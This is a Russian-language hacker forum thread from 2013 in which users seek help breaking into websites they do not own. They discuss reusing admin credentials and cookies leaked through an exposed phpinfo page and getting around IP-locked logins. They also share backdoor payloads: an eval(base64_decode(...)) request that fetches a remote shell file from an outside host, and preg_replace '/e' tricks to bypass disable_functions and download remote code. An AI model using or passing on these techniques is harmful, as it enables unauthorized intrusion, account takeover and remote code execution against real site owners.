HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 04.04.2013, 11:16
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
С нами: 8866466

Репутация: 564
По умолчанию

в phpinfo логин и пасс ? 0_о
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
 
Ответить с цитированием

  #2  
Старый 04.04.2013, 12:51
zloy_fantom
Познающий
Регистрация: 03.12.2012
Сообщений: 46
С нами: 7074326

Репутация: 0
По умолчанию

Цитата:
Сообщение от shell_c0de  
в phpinfo логин и пасс ? 0_о
Как в том анекдоте про говорящую корову: "Че смотришь? Я сама охуела".

НО, как я уже сказал, залогиниться под ним не могу. Там-же, кстати еще и куки прописаны, но подставлять пока не пробовал, к тому-же не понятно, админские они или нет, и не залочит-ли их сервер с другого ип, как лочит авторизацию...

Помогите советом
 
Ответить с цитированием

  #3  
Старый 04.04.2013, 22:10
zloy_fantom
Познающий
Регистрация: 03.12.2012
Сообщений: 46
С нами: 7074326

Репутация: 0
По умолчанию

Подскажите, это:

passhash=md5(concat(salt,concat(" . sqlesc($password) . ",salt)))

означает

md5(md5(salt.pass.salt))

или

md5(md5(salt.md5(pass).salt))

Или нет?
 
Ответить с цитированием

  #4  
Старый 04.04.2013, 22:33
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами: 9176038

Репутация: 8
По умолчанию

Цитата:
Сообщение от zloy_fantom  
Подскажите, это:
passhash=md5(concat(salt,concat(" . sqlesc($password) . ",salt)))
означает
md5(md5(salt.pass.salt))
или
md5(md5(salt.md5(pass).salt))
Или нет?
md5(salt.password.salt)
 
Ответить с цитированием

  #5  
Старый 04.04.2013, 22:34
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами: 9176038

Репутация: 8
По умолчанию

Цитата:
Сообщение от zloy_fantom  
Нарыл на сайте спрятанный пхпинфо, а в нем пасс и логин админа, только админ залогинен круглосуточно, а сайт не позволяет залогиниться с разных ип одному юзеру. Как это можно обойти?
Чё за бред ? Быть такого не может...
 
Ответить с цитированием

  #6  
Старый 04.04.2013, 23:54
sova1611
Новичок
Регистрация: 10.01.2009
Сообщений: 0
С нами: 9123115

Репутация: 0
По умолчанию

короче имеем бэкдор,заходил раньше через ?e=eval(base64_decode(ZXZhbChmaWxlX2dldF9jb250ZW50 cygnaHR0cDovL3NpdGUucnUvc2hlbGwudHh0JykpOw)); (код base64 изменил),саты переехали на другой серв,сейчас быкдор так же есть ,проверял через ?e=phpinfo(); ,но уже в шел не попадаю(так каак стоит disable_functions

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]eval,[/COLOR][COLOR="#0000BB"]exec[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]system[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]passthru[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]scandir[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]popen[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]shell_exec[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]proc_open[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]proc_close[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]proc_nice[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]get_current_user[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]getmyuid[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]posix_getpwuid[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]apache_get_modules[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]virtual[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]posix_getgrgid[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]getmyinode[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]fileowner[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]filegroup[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]getmypid[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]apache_get_version[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]apache_getenv[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]apache_note[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]apache_setenv[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]disk_free_space[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]diskfreespace[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]dl[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]ini_restore[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]openlog[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]syslog[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]highlight_file[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]show_source[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]symlink[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]disk_total_space[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]ini_get_all[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]get_current_user[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]posix_uname[/COLOR][/COLOR
тоесть eval отключён( как теперь можно попасть в шел)
 
Ответить с цитированием

  #7  
Старый 05.04.2013, 00:19
zloy_fantom
Познающий
Регистрация: 03.12.2012
Сообщений: 46
С нами: 7074326

Репутация: 0
По умолчанию

Цитата:
Сообщение от BigBear  
Чё за бред ? Быть такого не может...
Поверьте, там есть данные:

 
Ответить с цитированием

  #8  
Старый 05.04.2013, 00:20
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами: 10095779

Репутация: 137
По умолчанию

Цитата:
Сообщение от sova1611  
короче имеем бэкдор,заходил раньше через ?e=eval(base64_decode(ZXZhbChmaWxlX2dldF9jb250ZW50 cygnaHR0cDovL3NpdGUucnUvc2hlbGwudHh0JykpOw)); (код base64 изменил),саты переехали на другой серв,сейчас быкдор так же есть ,проверял через ?e=phpinfo(); ,но уже в шел не попадаю(так каак стоит disable_functions
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]eval,[/COLOR][COLOR="#0000BB"]exec[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]system[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]passthru[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]scandir[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]popen[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]shell_exec[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]proc_open[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]proc_close[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]proc_nice[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]get_current_user[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]getmyuid[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]posix_getpwuid[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]apache_get_modules[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]virtual[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]posix_getgrgid[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]getmyinode[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]fileowner[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]filegroup[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]getmypid[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]apache_get_version[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]apache_getenv[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]apache_note[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]apache_setenv[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]disk_free_space[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]diskfreespace[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]dl[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]ini_restore[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]openlog[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]syslog[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]highlight_file[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]show_source[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]symlink[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]disk_total_space[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]ini_get_all[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]get_current_user[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]posix_uname[/COLOR][/COLOR
тоесть eval отключён( как теперь можно попасть в шел)
Попробуй так:

?e=preg_replace("/.*/e","phpinfo();",".");

P.S: Как такавой функция preg_*(); может полностью вам заменить eval(); вам остается только синтаксис разобрать!
 
Ответить с цитированием

  #9  
Старый 05.04.2013, 00:57
sova1611
Новичок
Регистрация: 10.01.2009
Сообщений: 0
С нами: 9123115

Репутация: 0
По умолчанию

Цитата:
Сообщение от winstrool  
Попробуй так:
?e=preg_replace("/.*/e","phpinfo();",".");
P.S:
Как такавой функция preg_*(); может полностью вам заменить eval(); вам остается только синтаксис разобрать!
выдало Hacking attempt! а на другом бэкдоре выдало phpinfo

а вот ?e=preg_replace("/.*/e","file_get_contents('http://site.ru/2.txt');",".");

не обработало ни на одном(
 
Ответить с цитированием

  #10  
Старый 05.04.2013, 00:59
sova1611
Новичок
Регистрация: 10.01.2009
Сообщений: 0
С нами: 9123115

Репутация: 0
По умолчанию

Цитата:
Сообщение от zloy_fantom  
Поверьте, там есть данные:

это твои куки)))
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.